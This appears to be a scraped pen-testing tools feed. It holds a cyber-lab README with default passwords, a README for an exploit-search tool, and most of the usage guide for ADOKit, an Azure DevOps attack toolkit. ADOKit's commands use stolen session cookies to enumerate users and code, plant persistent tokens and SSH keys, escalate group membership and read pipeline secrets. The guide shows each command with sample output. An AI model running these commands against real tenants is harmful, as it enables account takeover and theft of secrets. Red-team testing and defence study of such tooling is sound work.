      • Port 6080 (Access to attack network)
      • Port 7080 (Access to defense network)
      • Port 8080 (Access to monitor network)

      Example usage

      Access internal network with proxy socks5

      • curl --proxy socks5://ipaddress:6080 http://10.0.0.100/vnc.html
      • curl --proxy socks5://ipaddress:7080 http://10.0.1.101/vnc.html
      • curl --proxy socks5://ipaddress:8080 http://10.0.3.102/vnc.html

      Remote ssh with ssh client

      • ssh kali@ipaddress -p 6080 (default password: attackpassword)
      • ssh kali@ipaddress -p 7080 (default password: defensepassword)
      • ssh kali@ipaddress -p 8080 (default password: monitorpassword)

      Access kali linux desktop with curl / browser

      • curl http://ipaddress:6080/vnc.html
      • curl http://ipaddress:7080/vnc.html
      • curl http://ipaddress:8080/vnc.html

      Domain Access

      • http://attack.lab/vnc.html (default password: attackpassword)
      • http://defense.lab/vnc.html (default password: defensepassword)
      • http://monitor.lab/vnc.html (default password: monitorpassword)
      • https://gophish.lab:3333/ (default username: admin, default password: gophishpassword)
      • https://server.lab/ (default username: postmaster@server.lab, default passowrd: mailpassword)
      • https://server.lab/iredadmin/ (default username: postmaster@server.lab, default passowrd: mailpassword)
      • https://mail.server.lab/ (default username: postmaster@server.lab, default passowrd: mailpassword)
      • https://mail.server.lab/iredadmin/ (default username: postmaster@server.lab, default passowrd: mailpassword)
      • http://phising.lab/
      • http://10.0.0.200:8081/
      • http://gitea.lab/ (default username: csalab, default password: giteapassword)
      • http://dvwa.lab/ (default username: admin, default passowrd: password)
      • http://dvwa-monitor.lab/ (default username: admin, default passowrd: password)
      • http://dvwa-modsecurity.lab/ (default username: admin, default passowrd: password)
      • http://wackopicko.lab/
      • http://juiceshop.lab/
      • https://wazuh-indexer.lab:9200/ (default username: admin, default passowrd: SecretPassword)
      • https://wazuh-manager.lab/
      • https://wazuh-dashboard.lab:5601/ (default username: admin, default passowrd: SecretPassword)
      • http://splunk.lab/ (default username: admin, default password: splunkpassword)
      • https://infectionmonkey.lab:5000/
      • http://purpleops.lab/ (default username: admin@purpleops.com, default password: purpleopspassword)
      • http://caldera.lab/ (default username: red/blue, default password: calderapassword)

      Network / IP Address

      Attack

      • 10.0.0.100 attack.lab
      • 10.0.0.200 phising.lab
      • 10.0.0.201 server.lab
      • 10.0.0.201 mail.server.lab
      • 10.0.0.202 gophish.lab
      • 10.0.0.110 infectionmonkey.lab
      • 10.0.0.111 mongodb.lab
      • 10.0.0.112 purpleops.lab
      • 10.0.0.113 caldera.lab

      Defense

      • 10.0.1.101 defense.lab
      • 10.0.1.10 dvwa.lab
      • 10.0.1.13 wackopicko.lab
      • 10.0.1.14 juiceshop.lab
      • 10.0.1.20 gitea.lab
      • 10.0.1.110 infectionmonkey.lab
      • 10.0.1.112 purpleops.lab
      • 10.0.1.113 caldera.lab

      Monitor

      • 10.0.3.201 server.lab
      • 10.0.3.201 mail.server.lab
      • 10.0.3.9 mariadb.lab
      • 10.0.3.10 dvwa.lab
      • 10.0.3.11 dvwa-monitor.lab
      • 10.0.3.12 dvwa-modsecurity.lab
      • 10.0.3.102 monitor.lab
      • 10.0.3.30 wazuh-manager.lab
      • 10.0.3.31 wazuh-indexer.lab
      • 10.0.3.32 wazuh-dashboard.lab
      • 10.0.3.40 splunk.lab

      Public

      • 10.0.2.101 defense.lab
      • 10.0.2.13 wackopicko.lab

      Internet

      • 10.0.4.102 monitor.lab
      • 10.0.4.30 wazuh-manager.lab
      • 10.0.4.32 wazuh-dashboard.lab
      • 10.0.4.40 splunk.lab

      Internal

      • 10.0.5.100 attack.lab
      • 10.0.5.12 dvwa-modsecurity.lab
      • 10.0.5.13 wackopicko.lab

      License

      This Docker Compose application is released under the MIT License. See the LICENSE file for details.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Sicat - The Useful Exploit Finder

      By: Zion3R β€” April 9th 2024 at 12:30

      Introduction

      SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

      SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.


      SiCat Resources

      Installation

      git clone https://github.com/justakazh/sicat.git && cd sicat

      pip install -r requirements.txt

      Usage


      ~$ python sicat.py --help

      Command Line Options:

      Command Description
      -h Show help message and exit
      -k KEYWORD
      -kv KEYWORK_VERSION
      -nm Identify via nmap output
      --nvd Use NVD as info source
      --packetstorm Use PacketStorm as info source
      --exploitdb Use ExploitDB as info source
      --exploitalert Use ExploitAlert as info source
      --msfmoduke Use metasploit as info source
      -o OUTPUT Path to save output to
      -ot OUTPUT_TYPE Output file type: json or html

      Examples

      From keyword


      python sicat.py -k telerik --exploitdb --msfmodule

      From nmap output


      nmap --open -sV localhost -oX nmap_out.xml
      python sicat.py -nm nmap_out.xml --packetstorm

      To-do

      • [ ] Input from nmap result from pipeline
      • [ ] Nmap multiple host support
      • [ ] Search NSE Script
      • [ ] Search by PORT

      Contribution

      I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcomed and valued.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      ADOKit - Azure DevOps Services Attack Toolkit

      By: Zion3R β€” April 6th 2024 at 11:30


      Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.

      Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.


      Installation/Building

      Libraries Used

      The below 3rd party libraries are used in this project.

      Library URL License
      Fody https://github.com/Fody/Fody MIT License
      Newtonsoft.Json https://github.com/JamesNK/Newtonsoft.Json MIT License

      Pre-Compiled

      • Use the pre-compiled binary in Releases

      Building Yourself

      Take the below steps to setup Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.

      • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
      • Go to "NuGet Package Manager" --> "Package Sources"
      • Add a package source with the URL https://api.nuget.org/v3/index.json
      • Install the Costura.Fody NuGet package.
      • Install-Package Costura.Fody -Version 3.3.3
      • Install the Newtonsoft.Json package
      • Install-Package Newtonsoft.Json
      • You can now build the project yourself!

      Command Modules

      • Recon
      • check - Check whether organization uses Azure DevOps and if credentials are valid
      • whoami - List the current user and its group memberships
      • listrepo - List all repositories
      • searchrepo - Search for given repository
      • listproject - List all projects
      • searchproject - Search for given project
      • searchcode - Search for code containing a search term
      • searchfile - Search for file based on a search term
      • listuser - List users
      • searchuser - Search for a given user
      • listgroup - List groups
      • searchgroup - Search for a given group
      • getgroupmembers - List all group members for a given group
      • getpermissions - Get the permissions for who has access to a given project
      • Persistence
      • createpat - Create personal access token for user
      • listpat - List personal access tokens for user
      • removepat - Remove personal access token for user
      • createsshkey - Create public SSH key for user
      • listsshkey - List public SSH keys for user
      • removesshkey - Remove public SSH key for user
      • Privilege Escalation
      • addprojectadmin - Add a user to the "Project Administrators" for a given project
      • removeprojectadmin - Remove a user from the "Project Administrators" group for a given project
      • addbuildadmin - Add a user to the "Build Administrators" group for a given project
      • removebuildadmin - Remove a user from the "Build Administrators" group for a given project
      • addcollectionadmin - Add a user to the "Project Collection Administrators" group
      • removecollectionadmin - Remove a user from the "Project Collection Administrators" group
      • addcollectionbuildadmin - Add a user to the "Project Collection Build Administrators" group
      • removecollectionbuildadmin - Remove a user from the "Project Collection Build Administrators" group
      • addcollectionbuildsvc - Add a user to the "Project Collection Build Service Accounts" group
      • removecollectionbuildsvc - Remove a user from the "Project Collection Build Service Accounts" group
      • addcollectionsvc - Add a user to the "Project Collection Service Accounts" group
      • removecollectionsvc - Remove a user from the "Project Collection Service Accounts" group
      • getpipelinevars - Retrieve any pipeline variables used for a given project.
      • getpipelinesecrets - Retrieve the names of any pipeline secrets used for a given project.
      • getserviceconnections - Retrieve the service connections used for a given project.

      Arguments/Options

      • /credential: - credential for authentication (PAT or Cookie). Applicable to all modules.
      • /url: - Azure DevOps URL. Applicable to all modules.
      • /search: - Keyword to search for. Not applicable to all modules.
      • /project: - Project to perform an action for. Not applicable to all modules.
      • /user: - Perform an action against a specific user. Not applicable to all modules.
      • /id: - Used with persistence modules to perform an action against a specific token ID. Not applicable to all modules.
      • /group: - Perform an action against a specific group. Not applicable to all modules.

      Authentication Options

      Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.

      • Stolen Cookie - This will be the UserAuthentication cookie on a user's machine for the .dev.azure.com domain.
      • /credential:UserAuthentication=ABC123
      • Personal Access Token (PAT) - This will be an access token/API key that will be a single string.
      • /credential:apiToken

      Module Details Table

      The below table shows the permissions required for each module.

      Attack Scenario Module Special Permissions? Notes
      Recon check No
      Recon whoami No
      Recon listrepo No
      Recon searchrepo No
      Recon listproject No
      Recon searchproject No
      Recon searchcode No
      Recon searchfile No
      Recon listuser No
      Recon searchuser No
      Recon listgroup No
      Recon searchgroup No
      Recon getgroupmembers No
      Recon getpermissions No
      Persistence createpat No
      Persistence listpat No
      Persistence removepat No
      Persistence createsshkey No
      Persistence listsshkey No
      Persistence removesshkey No
      Privilege Escalation addprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
      Privilege Escalation removeprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
      Privilege Escalation addbuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
      Privilege Escalation removebuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
      Privilege Escalation addcollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
      Privilege Escalation removecollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
      Privilege Escalation addcollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
      Privilege Escalation removecollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
      Privilege Escalation addcollectionbuildsvc Yes - Project Collection Administrator, Project Colection Build Administrators or Project Collection Service Accounts
      Privilege Escalation removecollectionbuildsvc Yes - Project Collection Administrator, Project Colection Build Administrators or Project Collection Service Accounts
      Privilege Escalation addcollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
      Privilege Escalation removecollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
      Privilege Escalation getpipelinevars Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
      Privilege Escalation getpipelinesecrets Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
      Privilege Escalation getserviceconnections Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts

      Examples

      Validate Azure DevOps Access

      Use Case

      Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.

      Syntax

      Provide the check module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.

      ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName

      ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: check
      Auth Type: API Key
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 3/28/2023 3:33:01 PM
      ==================================================


      [*] INFO: Checking if organization provided uses Azure DevOps

      [+] SUCCESS: Organization provided exists in Azure DevOps


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      3/28/23 19:33:02 Finished execution of check

      Whoami

      Use Case

      Get the current user and the user's group memberhips

      Syntax

      Provide the whoami module, along with any relevant authentication information and URL. This will output the current user and all of its group memberhips.

      ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName

      ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: whoami
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 11:33:12 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Username | Display Name | UPN
      ------------------------------------------------------------------------------------------------------------------------------------------------------------
      jsmith | John Smith | jsmith@YourOrganization.onmicrosoft. com


      [*] INFO: Listing group memberships for the current user


      Group UPN | Display Name | Description
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
      [TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
      [MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
      [YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.

      4/4/23 15:33:19 Finished execution of whoami

      List Repos

      Use Case

      Discover repositories being used in Azure DevOps instance

      Syntax

      Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.

      ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName

      ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: listrepo
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 3/29/2023 8:41:50 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Name | URL
      -----------------------------------------------------------------------------------
      TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
      MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
      SomeOtherRepo | https://dev.azure.com/YourOrganization/Projec tWithMultipleRepos/_git/SomeOtherRepo
      AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
      ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
      TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

      3/29/23 12:41:53 Finished execution of listrepo

      Search Repos

      Use Case

      Search for repositories by repository name in Azure DevOps instance

      Syntax

      Provide the searchrepo module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.

      ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

      ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

      Example Output

      C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"

      ==================================================
      Module: searchrepo
      Auth Type: API Key
      Search Term: test
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 3/29/2023 9:26:57 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Name | URL
      -----------------------------------------------------------------------------------
      TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
      TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

      3/29/23 13:26:59 Finished execution of searchrepo

      List Projects

      Use Case

      Discover projects being used in Azure DevOps instance

      Syntax

      Provide the listproject module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.

      ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName

      ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: listproject
      Auth Type: API Key
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 7:44:59 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Name | Visibility | URL
      -----------------------------------------------------------------------------------------------------
      TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
      MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
      ProjectWithMultipleRepos | private | http s://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
      TestProject | private | https://dev.azure.com/YourOrganization/TestProject

      4/4/23 11:45:04 Finished execution of listproject

      Search Projects

      Use Case

      Search for projects by project name in Azure DevOps instance

      Syntax

      Provide the searchproject module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.

      ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

      ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

      Example Output

      C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"

      ==================================================
      Module: searchproject
      Auth Type: API Key
      Search Term: map
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 7:45:30 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Name | Visibility | URL
      -----------------------------------------------------------------------------------------------------
      MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap

      4/4/23 11:45:31 Finished execution of searchproject

      Search Code

      Use Case

      Search for code containing a given keyword in Azure DevOps instance

      Syntax

      Provide the searchcode module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.

      ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password

      ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password

      Example Output

      C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"

      ==================================================
      Module: searchcode
      Auth Type: Cookie
      Search Term: password
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 3/29/2023 3:22:21 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
      |_ Console.WriteLine("PassWord");
      |_ this is some text that has a password in it

      [>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
      |_ Console.WriteLine("PaSsWoRd");

      [*] Match count : 3

      3/29/23 19:22:22 Finished execution of searchco de

      Search Files

      Use Case

      Search for files in repositories containing a given keyword in the file name in Azure DevOps

      Syntax

      Provide the searchfile module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.

      ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline

      ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline

      Example Output

      C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"

      ==================================================
      Module: searchfile
      Auth Type: Cookie
      Search Term: test
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 3/29/2023 11:28:34 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      File URL
      ----------------------------------------------------------------------------------------------------
      https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
      https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.c s
      https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs

      3/29/23 15:28:37 Finished execution of searchfile

      Create PAT

      Use Case

      Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.

      Syntax

      Provide the createpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, date valid til, and token content for the PAT created. The name of the PAT created will be ADOKit- followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

      ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: createpat
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 3/31/2023 2:33:09 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      PAT ID | Name | Scope | Valid Until | Token Value
      ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit- rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere

      3/31/23 18:33:10 Finished execution of createpat

      List PATs

      Use Case

      List all personal access tokens (PAT's) for a given user in an Azure DevOps instance.

      Syntax

      Provide the listpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and date valid til for all active PAT's for the user.

      ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName

      ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: listpat
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 3/31/2023 2:33:17 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      PAT ID | Name | Scope | Valid Until
      -------------------------------------------------------------------------------------------------------------------------------------------
      9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
      8776252f-9e03-48ea-a85c-f880cc8308 98 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM

      3/31/23 18:33:18 Finished execution of listpat

      Remove PAT

      Use Case

      Remove a PAT for a given user in an Azure DevOps instance.

      Syntax

      Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id: argument. This will output whether the PAT was removed or not, and then will list the current active PAT's for the user after performing the removal.

      ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

      ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

      Example Output

      C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298

      ==================================================
      Module: removepat
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/3/2023 11:04:59 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.

      PAT ID | Name | Scope | Valid Until
      -------------------------------------------------------------------------------------------------------------------------------------------
      9b354668-4424-4505-a35f-d098903 4da18 | test-token | app_token | 4/29/2023 1:20:45 PM

      4/3/23 15:05:00 Finished execution of removepat

      Create SSH Key

      Use Case

      Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.

      Syntax

      Provide the createsshkey module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey: argument. This will output the SSH key ID, name, scope, date valid til, and last 20 characters of the public SSH key for the SSH key created. The name of the SSH key created will be ADOKit- followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

      ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"

      Example Output

      C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"

      ==================================================
      Module: createsshkey
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/3/2023 2:51:22 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      SSH Key ID | Name | Scope | Valid Until | Public SSH Key
      -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
      fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=

      4/3/23 18:51:24 Finished execution of createsshkey

      List SSH Keys

      Use Case

      List all public SSH keys for a given user in an Azure DevOps instance.

      Syntax

      Provide the listsshkey module, along with any relevant authentication information and URL. This will output the SSH Key ID, name, scope, and date valid til for all active SSH key's for the user. Additionally, it will print the last 20 characters of the public SSH key.

      ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName

      ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: listsshkey
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/3/2023 11:37:10 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      SSH Key ID | Name | Scope | Valid Until | Public SSH Key
      -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
      ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

      4/3/23 15:37:11 Finished execution of listsshkey

      Remove SSH Key

      Use Case

      Remove an SSH key for a given user in an Azure DevOps instance.

      Syntax

      Provide the removesshkey module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id: argument. This will output whether SSH key was removed or not, and then will list the current active SSH key's for the user after performing the removal.

      ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

      ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

      Example Output

      C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97

      ==================================================
      Module: removesshkey
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/3/2023 1:50:08 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.

      SSH Key ID | Name | Scope | Valid Until | Public SSH Key
      ---------------------------------------------------------------------------------------------------------------------------------------------- -------------------------
      ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

      4/3/23 17:50:09 Finished execution of removesshkey

      List Users

      Use Case

      List users within an Azure DevOps instance

      Syntax

      Provide the listuser module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.

      ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName

      ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: listuser
      Auth Type: API Key
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/3/2023 4:12:07 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Username | Display Name | UPN
      ------------------------------------------------------------------------------------------------------------------------------------------------------------
      user1 | User 1 | user1@YourOrganization.onmicrosoft.com
      jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
      rsmith | Ron Smith | rsmith@YourOrganization.onmicrosoft.com
      user2 | User 2 | user2@YourOrganization.onmicrosoft.com

      4/3/23 20:12:08 Finished execution of listuser

      Search User

      Use Case

      Search for given user(s) in Azure DevOps instance

      Syntax

      Provide the searchuser module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.

      ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user

      ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user

      Example Output

      C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"

      ==================================================
      Module: searchuser
      Auth Type: API Key
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/3/2023 4:12:23 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Username | Display Name | UPN
      ------------------------------------------------------------------------------------------------------------------------------------------------------------
      user1 | User 1 | user1@YourOrganization.onmic rosoft.com
      user2 | User 2 | user2@YourOrganization.onmicrosoft.com

      4/3/23 20:12:24 Finished execution of searchuser

      List Groups

      Use Case

      List groups within an Azure DevOps instance

      Syntax

